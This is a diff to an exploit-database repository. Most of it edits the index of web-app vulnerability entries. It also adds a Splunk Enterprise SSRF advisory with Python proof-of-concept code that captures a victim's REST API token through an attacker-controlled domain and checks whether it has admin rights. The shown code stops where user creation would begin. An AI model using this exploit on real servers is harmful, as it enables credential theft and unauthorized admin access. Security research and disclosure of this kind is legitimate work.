+5928,platforms/php/webapps/5928.txt,"HiveMaker Directory 1.0.2 - 'cid' Parameter SQL Injection",2008-06-24,"security fears team",php,webapps,0
+5929,platforms/php/webapps/5929.txt,"E-topbiz ViralDX 2.07 - 'bannerid' Parameter SQL Injection",2008-06-24,"Hussin X",php,webapps,0
+5930,platforms/php/webapps/5930.txt,"Link ADS 1 - 'linkid' Parameter SQL Injection",2008-06-24,"Hussin X",php,webapps,0
+5931,platforms/php/webapps/5931.pl,"TOKOKITA - 'produk_id' Parameter SQL Injection",2008-06-24,k1tk4t,php,webapps,0
+5932,platforms/php/webapps/5932.txt,"Webdevindo-CMS 0.1 - 'hal' Parameter SQL Injection",2008-06-25,"CWH Underground",php,webapps,0
+5933,platforms/php/webapps/5933.txt,"mUnky 0.0.1 - 'zone' Parameter Local File Inclusion",2008-06-25,StAkeR,php,webapps,0
+5934,platforms/php/webapps/5934.txt,"Jokes & Funny Pics Script - 'sb_jokeid' Parameter SQL Injection",2008-06-25,"Hussin X",php,webapps,0
 5935,platforms/php/webapps/5935.pl,"Mambo Component Articles - 'artid' Parameter Blind SQL Injection",2008-06-25,"Ded MustD!e",php,webapps,0
 5936,platforms/php/webapps/5936.txt,"Page Manager CMS 2006-02-04 - Arbitrary File Upload",2008-06-25,"CWH Underground",php,webapps,0
-5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - (page.php pid) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0
-5938,platforms/php/webapps/5938.php,"PHPmotion 2.0 - (update_profile.php) Arbitrary File Upload",2008-06-25,EgiX,php,webapps,0
+5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - 'pid' Parameter SQL Injection",2008-06-25,"CWH Underground",php,webapps,0
+5938,platforms/php/webapps/5938.php,"PHPmotion 2.0 - 'update_profile.php' Arbitrary File Upload",2008-06-25,EgiX,php,webapps,0
 5939,platforms/php/webapps/5939.txt,"Joomla! Component netinvoice 1.2.0 SP1 - SQL Injection",2008-06-25,His0k4,php,webapps,0
 5940,platforms/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1)",2008-06-26,"CWH Underground",php,webapps,0
-5941,platforms/php/webapps/5941.txt,"polypager 1.0rc2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
-5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax 4.42 - (category) SQL Injection",2008-06-26,boom3rang,php,webapps,0
+5941,platforms/php/webapps/5941.txt,"polypager 1.0rc2 - SQL Injection / Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps,0
+5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax 4.42 - 'category' Parameter SQL Injection",2008-06-26,boom3rang,php,webapps,0
 5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion",2008-06-26,"CWH Underground",php,webapps,0
 5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework 0.6.4 - 'FCKeditor' Arbitrary File Upload",2008-06-26,EgiX,php,webapps,0
-5946,platforms/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 - (riddleid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0
-5947,platforms/php/webapps/5947.txt,"Tips Complete Website 1.2.0 - (tipid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0
-5948,platforms/php/webapps/5948.txt,"Jokes Complete Website 2.1.3 - (jokeid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0
-5949,platforms/php/webapps/5949.txt,"Drinks Complete Website 2.1.0 - (drinkid) SQL Injection",2008-06-26,InjEctOr5,php,webapps,0
-5950,platforms/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 - 'itemID' SQL Injection",2008-06-26,InjEctOr5,php,webapps,0
+5946,platforms/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 - 'riddleid' Parameter SQL Injection",2008-06-26,InjEctOr5,php,webapps,0
+5947,platforms/php/webapps/5947.txt,"Tips Complete Website 1.2.0 - 'tipid' Parameter SQL Injection",2008-06-26,InjEctOr5,php,webapps,0
+5948,platforms/php/webapps/5948.txt,"Easysitenetwork Jokes Complete Website 2.1.3 - 'jokeid' Parameter SQL Injection",2008-06-26,InjEctOr5,php,webapps,0
+5949,platforms/php/webapps/5949.txt,"Drinks Complete Website 2.1.0 - 'drinkid' Parameter SQL Injection",2008-06-26,InjEctOr5,php,webapps,0
+5950,platforms/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 - 'itemID' Parameter SQL Injection",2008-06-26,InjEctOr5,php,webapps,0
 5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion",2008-06-26,CraCkEr,php,webapps,0
 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts - Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0
-5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - (Parameters.php) Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0
+5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - 'Parameters.php' Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0
 5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (2)",2008-06-26,StAkeR,php,webapps,0
-5957,platforms/php/webapps/5957.txt,"OTManager CMS 24a - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0
+5957,platforms/php/webapps/5957.txt,"OTManager CMS 24a - Local File Inclusion / Cross-Site Scripting",2008-06-27,"CWH Underground",php,webapps,0
 5958,platforms/php/webapps/5958.txt,"W1L3D4 philboard 1.2 - Blind SQL Injection / Cross-Site Scripting",2008-06-27,Bl@ckbe@rD,php,webapps,0
 5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 - Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0
-5960,platforms/php/webapps/5960.txt,"SePortal 2.4 - (poll.php poll_id) SQL Injection",2008-06-27,Mr.SQL,php,webapps,0
+5960,platforms/php/webapps/5960.txt,"SePortal 2.4 - 'poll_id' Parameter SQL Injection",2008-06-27,Mr.SQL,php,webapps,0
 5961,platforms/php/webapps/5961.txt,"PHP-Fusion Mod Classifieds - 'lid' Parameter SQL Injection",2008-06-27,boom3rang,php,webapps,0
-5962,platforms/php/webapps/5962.txt,"poweraward 1.1.0 rc1 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-28,CraCkEr,php,webapps,0
-5963,platforms/php/webapps/5963.txt,"Joomla! Component jabode - 'id' SQL Injection",2008-06-28,His0k4,php,webapps,0
-5964,platforms/php/webapps/5964.txt,"Online Booking Manager 2.2 - 'id' SQL Injection",2008-06-28,"Hussin X",php,webapps,0
+5962,platforms/php/webapps/5962.txt,"poweraward 1.1.0 rc1 - Local File Inclusion / Cross-Site Scripting",2008-06-28,CraCkEr,php,webapps,0
+5963,platforms/php/webapps/5963.txt,"Joomla! Component jabode - 'id' Parameter SQL Injection",2008-06-28,His0k4,php,webapps,0
+5964,platforms/php/webapps/5964.txt,"Online Booking Manager 2.2 - 'id' Parameter SQL Injection",2008-06-28,"Hussin X",php,webapps,0
 5965,platforms/php/webapps/5965.txt,"Joomla! Component beamospetition - SQL Injection",2008-06-28,His0k4,php,webapps,0
-5966,platforms/php/webapps/5966.pl,"Joomla! Component Xe webtv - 'id' Blind SQL Injection",2008-06-28,His0k4,php,webapps,0
+5966,platforms/php/webapps/5966.pl,"Joomla! Component Xe webtv - 'id' Parameter Blind SQL Injection",2008-06-28,His0k4,php,webapps,0
 5967,platforms/php/webapps/5967.txt,"SebracCMS 0.4 - Multiple SQL Injections",2008-06-28,shinmai,php,webapps,0
-5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 - 'pow' SQL Injection",2008-06-30,anonymous,php,webapps,0
-5970,platforms/php/webapps/5970.txt,"eSHOP100 - (SUB) SQL Injection",2008-06-30,JuDge,php,webapps,0
+5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 - 'pow' Parameter SQL Injection",2008-06-30,anonymous,php,webapps,0
+5970,platforms/php/webapps/5970.txt,"eSHOP100 - 'SUB' Parameter SQL Injection",2008-06-30,JuDge,php,webapps,0
 5971,platforms/php/webapps/5971.pl,"BareNuked CMS 1.1.0 - Arbitrary Add Admin",2008-06-30,"CWH Underground",php,webapps,0
 5972,platforms/php/webapps/5972.txt,"RCM Revision Web Development - 'products.php' SQL Injection",2008-06-30,Niiub,php,webapps,0
 5973,platforms/php/webapps/5973.php,"Pivot 1.40.5 - Dreamwind load_template() Credentials Disclosure",2008-06-30,Nine:Situations:Group,php,webapps,0
@@ -19891,7 +19894,7 @@ id,file,description,date,author,platform,type,port
 7074,platforms/php/webapps/7074.txt,"X10media Mp3 Search Engine 1.6 - Remote File Disclosure",2008-11-09,THUNDER,php,webapps,0
 7075,platforms/jsp/webapps/7075.txt,"Openfire Server 3.6.0a - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-09,"Andreas Kurtz",jsp,webapps,0
 7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 - (Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload) Multiple Vulnerabilities",2008-11-10,USH,php,webapps,0
-7077,platforms/php/webapps/7077.txt,"OTManager CMS 2.4 - (Tipo) Remote File Inclusion",2008-11-10,Colt7r,php,webapps,0
+7077,platforms/php/webapps/7077.txt,"OTManager CMS 2.4 - 'Tipo' Parameter Remote File Inclusion",2008-11-10,Colt7r,php,webapps,0
 7078,platforms/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - 'PostID' Parameter SQL Injection",2008-11-10,boom3rang,php,webapps,0
 7079,platforms/php/webapps/7079.txt,"FREEsimplePHPGuestbook - 'Guestbook.php' Remote Code Execution",2008-11-10,GoLd_M,php,webapps,0
 7080,platforms/php/webapps/7080.txt,"fresh email script 1.0 - Multiple Vulnerabilities",2008-11-10,Don,php,webapps,0
@@ -20513,7 +20516,7 @@ id,file,description,date,author,platform,type,port
 7925,platforms/php/webapps/7925.txt,"revou twitter clone - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-30,nuclear,php,webapps,0
 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0
 7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-30,"Mehmet Ince",php,webapps,0
-7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - (Topic) Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps,0
+7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps,0
 7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - (Authentication Bypass) SQL Injection",2009-01-30,Dimi4,php,webapps,0
 7933,platforms/php/webapps/7933.txt,"eVision CMS 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0
 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-02,ahmadbady,php,webapps,0
@@ -20581,7 +20584,7 @@ id,file,description,date,author,platform,type,port
 8025,platforms/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusion",2009-02-09,ahmadbady,php,webapps,0
 8026,platforms/php/webapps/8026.txt,"WB News 2.1.1 - config[installdir] Remote File Inclusion",2009-02-09,ahmadbady,php,webapps,0
 8027,platforms/php/webapps/8027.txt,"Gaeste 1.6 - (gastbuch.php) Remote File Disclosure",2009-02-09,bd0rk,php,webapps,0
-8028,platforms/php/webapps/8028.pl,"Hedgehog-CMS 1.21 - (Local File Inclusion) Remote Command Execution",2009-02-09,Osirys,php,webapps,0
+8028,platforms/php/webapps/8028.pl,"Hedgehog-CMS 1.21 - Local File Inclusion / Remote Command Execution",2009-02-09,Osirys,php,webapps,0
 8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - (export_to) Local File Inclusion",2009-02-10,cheverok,php,webapps,0
 8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - (pfadhier) Local File Inclusion",2009-02-10,SirGod,php,webapps,0
 8031,platforms/php/webapps/8031.pph,"q-news 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0
@@ -20970,7 +20973,7 @@ id,file,description,date,author,platform,type,port
 8741,platforms/php/webapps/8741.txt,"DM FileManager 3.9.2 - (Authentication Bypass) SQL Injection",2009-05-19,snakespc,php,webapps,0
 8743,platforms/php/webapps/8743.txt,"Joomla! Component Casino 0.3.1 - Multiple SQL Injections Exploits",2009-05-20,ByALBAYX,php,webapps,0
 8744,platforms/php/webapps/8744.txt,"Exjune Officer Message System 1 - Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0
-8745,platforms/php/webapps/8745.txt,"catviz 0.4.0b1 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps,0
+8745,platforms/php/webapps/8745.txt,"Catviz 0.4.0 beta1 - Local File Inclusion / Cross-Site Scripting",2009-05-20,ByALBAYX,php,webapps,0
 8746,platforms/php/webapps/8746.txt,"NC GBook 1.0 - Remote Command Injection",2009-05-20,"ThE g0bL!N",php,webapps,0
 8747,platforms/php/webapps/8747.txt,"NC LinkList 1.3.1 - Remote Command Injection",2009-05-20,"ThE g0bL!N",php,webapps,0
 8748,platforms/php/webapps/8748.txt,"Realty Web-Base 1.0 - (list_list.php id) SQL Injection",2009-05-20,"ThE g0bL!N",php,webapps,0
@@ -22010,7 +22013,7 @@ id,file,description,date,author,platform,type,port
 10734,platforms/php/webapps/10734.txt,"Joomla! Component com_beeheard - Blind SQL Injection",2009-12-27,FL0RiX,php,webapps,0
 10735,platforms/php/webapps/10735.txt,"com_jm-recommend - Cross-Site Scripting",2009-12-27,Pyske,php,webapps,0
 10736,platforms/php/webapps/10736.txt,"lineaCMS - Cross-Site Scripting",2009-12-27,Phenom,php,webapps,0
-10737,platforms/php/webapps/10737.txt,"Joomla! Component com_facileforms - Cross-Site Scripting",2009-12-27,Pyske,php,webapps,0
+10737,platforms/php/webapps/10737.txt,"Joomla! Component FacileForms - Cross-Site Scripting",2009-12-27,Pyske,php,webapps,0
 10738,platforms/php/webapps/10738.txt,"Joomla! Component com_qpersonel - Cross-Site Scripting",2009-12-27,Pyske,php,webapps,0
 10739,platforms/php/webapps/10739.txt,"Joomla! Component com_oprykningspoint_mc - Cross-Site Scripting",2009-12-27,Pyske,php,webapps,0
 10740,platforms/php/webapps/10740.txt,"Joomla! Component com_trabalhe_conosco - Cross-Site Scripting",2009-12-27,Pyske,php,webapps,0
@@ -23987,7 +23990,7 @@ id,file,description,date,author,platform,type,port
 15595,platforms/php/webapps/15595.txt,"jSchool Advanced - Blind SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0
 15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 - File Download Exploit",2010-11-22,Beach,jsp,webapps,0
 15597,platforms/asp/webapps/15597.txt,"Acidcat CMS 3.3 - 'FCKeditor' Arbitrary File Upload",2010-11-22,Net.Edit0r,asp,webapps,0
-15602,platforms/php/webapps/15602.txt,"PHPMotion 1.62 - 'FCKeditor' Arbitrary File Upload",2010-11-23,trycyber,php,webapps,0
+15602,platforms/php/webapps/15602.txt,"PHPmotion 1.62 - 'FCKeditor' Arbitrary File Upload",2010-11-23,trycyber,php,webapps,0
 15605,platforms/php/webapps/15605.txt,"Getsimple CMS 2.01 < 2.02 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0
 15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager - SQL Injection",2010-10-10,KnocKout,asp,webapps,0
 15232,platforms/php/webapps/15232.txt,"OrangeHRM 2.6.0.1 - Local File Inclusion",2010-10-11,ZonTa,php,webapps,0
@@ -25514,6 +25517,7 @@ id,file,description,date,author,platform,type,port
 20270,platforms/php/webapps/20270.txt,"WordPress Plugin Effective Lead Management 3.0.0 - Persistent Cross-Site Scripting",2012-08-05,"Chris Kellum",php,webapps,0
 20278,platforms/php/webapps/20278.txt,"phpix 1.0 - Directory Traversal",2000-10-07,Synnergy.net,php,webapps,0
 20320,platforms/windows/webapps/20320.txt,"Zoho BugTracker - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-07,LiquidWorm,windows,webapps,0
+40892,platforms/php/webapps/40892.txt,"Roundcube 1.2.2 - Remote Code Execution",2016-12-09,"Robin Peraglie",php,webapps,80
 20342,platforms/php/webapps/20342.php,"WespaJuris 3.0 - Multiple Vulnerabilities",2012-08-08,WhiteCollarGroup,php,webapps,0
 20343,platforms/php/webapps/20343.pl,"Joomla! Component 'com_enmasse' 1.2.0.4 - SQL Injection",2012-08-08,D4NB4R,php,webapps,0
 20344,platforms/php/webapps/20344.php,"AraDown - Blind SQL Injection",2012-08-08,G-B,php,webapps,0
@@ -26773,7 +26777,7 @@ id,file,description,date,author,platform,type,port
 24202,platforms/hardware/webapps/24202.txt,"Linksys WRT54GL (Firmware 4.30.15 build 2) - Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps,0
 24203,platforms/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0
 24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Command Execution",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0
-24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - Remote module_db.php File Inclusion",2004-06-15,loofus,php,webapps,0
+24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - 'module_db.php' Remote File Inclusion",2004-06-15,loofus,php,webapps,0
 24214,platforms/asp/webapps/24214.txt,"Web Wiz Forums 7.x - Registration_Rules.asp Cross-Site Scripting",2004-06-15,"Ferruh Mavituna",asp,webapps,0
 24215,platforms/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 - usersL.php3 Multiple Parameter SQL Injection",2004-06-15,HEX,php,webapps,0
 24216,platforms/php/webapps/24216.html,"phpHeaven phpMyChat 0.14.5 - edituser.php3 do_not_login Variable Authentication Bypass",2004-06-15,HEX,php,webapps,0
@@ -27566,7 +27570,7 @@ id,file,description,date,author,platform,type,port
 25823,platforms/php/webapps/25823.txt,"McGallery 1.0/1.1 - Lang Argument File Disclosure",2005-06-15,D_BuG,php,webapps,0
 25824,platforms/php/webapps/25824.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - Multiple Input Validation Vulnerabilities",2005-06-15,"GulfTech Security",php,webapps,0
 25825,platforms/php/webapps/25825.txt,"Ultimate PHP Board 1.8/1.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,"Alberto Trivero",php,webapps,0
-25612,platforms/php/webapps/25612.txt,"MyBloggie 2.1 - 'index.php' year Parameter Cross-Site Scripting",2005-05-05,"Alberto Trivero",php,webapps,0
+25612,platforms/php/webapps/25612.txt,"MyBloggie 2.1 - 'index.php' Cross-Site Scripting",2005-05-05,"Alberto Trivero",php,webapps,0
 25614,platforms/php/webapps/25614.txt,"MidiCart PHP - Search_List.php SearchString Parameter SQL Injection",2005-05-05,Exoduks,php,webapps,0
 25615,platforms/php/webapps/25615.txt,"MidiCart PHP - Item_List.php MainGroup Parameter SQL Injection",2005-05-05,Exoduks,php,webapps,0
 25616,platforms/php/webapps/25616.txt,"MidiCart PHP - Item_List.php SecondGroup Parameter SQL Injection",2005-05-05,Exoduks,php,webapps,0
@@ -32017,7 +32021,6 @@ id,file,description,date,author,platform,type,port
 31960,platforms/php/webapps/31960.txt,"A+ PHP Scripts News Management System 0.3 - Multiple Input Validation Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
 31961,platforms/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,php,webapps,80
 31962,platforms/ios/webapps/31962.txt,"Bluetooth Photo Share Pro 2.0 iOS - Multiple Vulnerabilities",2014-02-27,Vulnerability-Lab,ios,webapps,8080
-31963,platforms/php/webapps/31963.txt,"E-topbiz Link ADS 1 - 'out.php' SQL Injection",2008-06-24,"Hussin X",php,webapps,0
 31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway - 'Parameters' Parameter Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps,0
 32135,platforms/php/webapps/32135.txt,"common Solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",php,webapps,0
 32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - 'debug.jsp' HTML Injection / Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0
@@ -32029,7 +32032,6 @@ id,file,description,date,author,platform,type,port
 31976,platforms/php/webapps/31976.txt,"The Rat CMS - viewarticle2.php id Parameter Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps,0
 31977,platforms/php/webapps/31977.txt,"The Rat CMS - viewarticle.php id Parameter SQL Injection",2008-06-26,"CWH Underground",php,webapps,0
 31978,platforms/php/webapps/31978.txt,"The Rat CMS - viewarticle2.php id Parameter SQL Injection",2008-06-26,"CWH Underground",php,webapps,0
-31981,platforms/php/webapps/31981.txt,"PolyPager 0.9.51/1.0 - 'nr' Parameter Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps,0
 31982,platforms/php/webapps/31982.txt,"Webuzo 2.1.3 - Multiple Vulnerabilities",2014-02-28,Mahendra,php,webapps,80
 32134,platforms/php/webapps/32134.txt,"H0tturk Panel - 'gizli.php' Remote File Inclusion",2008-07-31,U238,php,webapps,0
 31983,platforms/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400
@@ -32040,9 +32042,9 @@ id,file,description,date,author,platform,type,port
 31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection",2014-03-01,Portcullis,windows,webapps,8080
 31994,platforms/windows/webapps/31994.txt,"Oracle Demantra 12.2.1 - Persistent Cross-Site Scripting",2014-03-01,Portcullis,windows,webapps,8080
 31995,platforms/windows/webapps/31995.txt,"Oracle Demantra 12.2.1 - Database Credentials Disclosure",2014-03-01,Portcullis,windows,webapps,8080
-32001,platforms/php/webapps/32001.txt,"RSS-aggregator 1.0 - admin/fonctions/supprimer_flux.php IdFlux Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0
-32002,platforms/php/webapps/32002.txt,"RSS-aggregator 1.0 - admin/fonctions/supprimer_tag.php IdTag Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0
-32003,platforms/php/webapps/32003.txt,"RSS-aggregator 1.0 - 'admin/fonctions/' Direct Request Administrator Authentication Bypass",2008-06-30,"CWH Underground",php,webapps,0
+32001,platforms/php/webapps/32001.txt,"RSS-aggregator 1.0 - 'IdFlux' Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0
+32002,platforms/php/webapps/32002.txt,"RSS-aggregator 1.0 - 'IdTag' Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0
+32003,platforms/php/webapps/32003.txt,"RSS-aggregator 1.0 - Authentication Bypass",2008-06-30,"CWH Underground",php,webapps,0
 32004,platforms/php/webapps/32004.txt,"FaName 1.0 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-06-30,"Jesper Jurcenoks",php,webapps,0
 32005,platforms/php/webapps/32005.txt,"FaName 1.0 - 'page.php' name Parameter Cross-Site Scripting",2008-06-30,"Jesper Jurcenoks",php,webapps,0
 32131,platforms/php/webapps/32131.txt,"ClipSharePro 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0
@@ -32904,8 +32906,8 @@ id,file,description,date,author,platform,type,port
 33542,platforms/php/webapps/33542.txt,"DataLife Engine 8.3 - engine/inc/help.php config[langs] Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0
 33543,platforms/php/webapps/33543.txt,"DataLife Engine 8.3 - engine/ajax/pm.php config[lang] Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0
 33544,platforms/php/webapps/33544.txt,"DataLife Engine 8.3 - engine/ajax/addcomments.php _REQUEST[skin] Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0
-33545,platforms/php/webapps/33545.txt,"Jokes Complete Website - joke.php id Parameter Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0
-33546,platforms/php/webapps/33546.txt,"Jokes Complete Website - results.php searchingred Parameter Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0
+33545,platforms/php/webapps/33545.txt,"Easysitenetwork Jokes Complete Website - 'id' Parameter Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0
+33546,platforms/php/webapps/33546.txt,"Easysitenetwork Jokes Complete Website - 'searchingred' Parameter Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0
 33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 - 'misc.php' SQL Injection",2010-01-18,indoushka,php,webapps,0
 33548,platforms/php/webapps/33548.txt,"THELIA 1.4.2.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,EsSandRe,php,webapps,0
 33550,platforms/php/webapps/33550.txt,"VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injection",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0
@@ -36849,6 +36851,7 @@ id,file,description,date,author,platform,type,port
 40809,platforms/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,php,webapps,0
 40816,platforms/xml/webapps/40816.txt,"SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML External Entity Injection",2016-11-22,ERPScan,xml,webapps,0
 40826,platforms/php/webapps/40826.py,"Osticket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting",2016-11-24,"Joaquin Ramirez Martinez",php,webapps,0
+40895,platforms/multiple/webapps/40895.py,"Splunk Enterprise 6.4.3 - Server-Side Request Forgery",2016-12-09,Security-Assessment.com,multiple,webapps,0
 40837,platforms/hardware/webapps/40837.txt,"Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting",2016-11-28,Vulnerability-Lab,hardware,webapps,0
 40842,platforms/java/webapps/40842.txt,"Red Hat JBoss EAP - Deserialization of Untrusted Data",2016-11-28,"Mediaservice.net Srl.",java,webapps,8080
 40850,platforms/php/webapps/40850.txt,"Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion",2016-11-30,"Lenon Leite",php,webapps,0

platforms/multiple/webapps/40895.py

@@ -0,0 +1,146 @@
+'''
+(    , )     (,
+  .   '.' ) ('.    ',
+   ). , ('.   ( ) (
+  (_,) .'), ) _ _,
+ /  _____/  / _  \    ____  ____   _____
+ \____  \==/ /_\  \ _/ ___\/  _ \ /     \
+ /       \/   |    \\  \__(  <_> )  Y Y  \
+/______  /\___|__  / \___  >____/|__|_|  /
+        \/         \/.-.    \/         \/:wq
+                    (x.0)
+                  '=.|w|.='
+                  _=''"''=.
+
+                presents..
+
+Splunk Enterprise Server-Side Request Forgery
+Affected versions: Splunk Enterprise <= 6.4.3
+
+PDF:
+http://security-assessment.com/files/documents/advisory/SplunkAdvisory.pdf
+
++-----------+
+|Description|
++-----------+
+The Splunk Enterprise application is affected by a server-side request
+forgery vulnerability. This vulnerability can be exploited by an
+attacker via social engineering or other vectors to exfiltrate
+authentication tokens for the Splunk REST API to an external domain.
+
++------------+
+|Exploitation|
++------------+
+==Server-Side Request Forgery==
+
+A server-side request forgery (SSRF) vulnerability exists in the Splunk
+Enterprise web management interface within the Alert functionality. The
+application parses user supplied data in the GET parameter ‘alerts_id’
+to construct a HTTP request to the splunkd daemon listening on TCP port
+8089. Since no validation is carried out on the parameter, an attacker
+can specify an external domain and force the application to make a HTTP
+request to an arbitrary destination host. The issue is aggravated by the
+fact that the application includes the REST API token for the currently
+authenticated user within the Authorization request header.
+
+This vulnerability can be exploited via social engineering to obtain
+unauthorized access to the Splunk REST API with the same privilege level
+of the captured API token.
+
+[POC SSRF LINK]
+/en-US/alerts/launcher?eai%3Aacl.app=launcher&eai%3Aacl.owner=*&severity=*&alerts_id=[DOMAIN]&search=test
+
+The proof of concept below can be used to listen for SSRF connections
+and automatically create a malicious privileged user when an
+administrative token is captured.
+
+[POC - splunk-poc.py]
+'''
+
+from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
+import httplib
+import ssl
+import requests
+
+token = ''
+
+class MyHandler(BaseHTTPRequestHandler):
+    def do_GET(self):
+        global token
+        try:
+            token = self.headers.get('Authorization')[7:]
+            print "[+] Captured Splunk API token from GET request"
+        except Exception, e:
+            print "[-] No API token captured on incoming connection..."
+
+def adminTokenNotCaptured():
+    global token
+    if token:
+        query = "/services/authentication/httpauth-tokens/" + token
+        conn = httplib.HTTPSConnection("<SPLUNK IP>", 8089,
+context=ssl._create_unverified_context())
+        conn.putrequest("GET", query)
+        conn.putheader("Authorization", "Splunk %s" % token)
+        conn.endheaders()
+        context = conn.getresponse().read()
+        if 'userName">admin' in context:
+            print "[+] Confirmed Splunk API token belongs to admin user"
+            print "[+] Admin Splunk API Token: %s" % token
+            return False
+        else:
+            print "[!] Splunk API token does not belong to admin user"
+
+    return True
+
+def poc():
+    global token
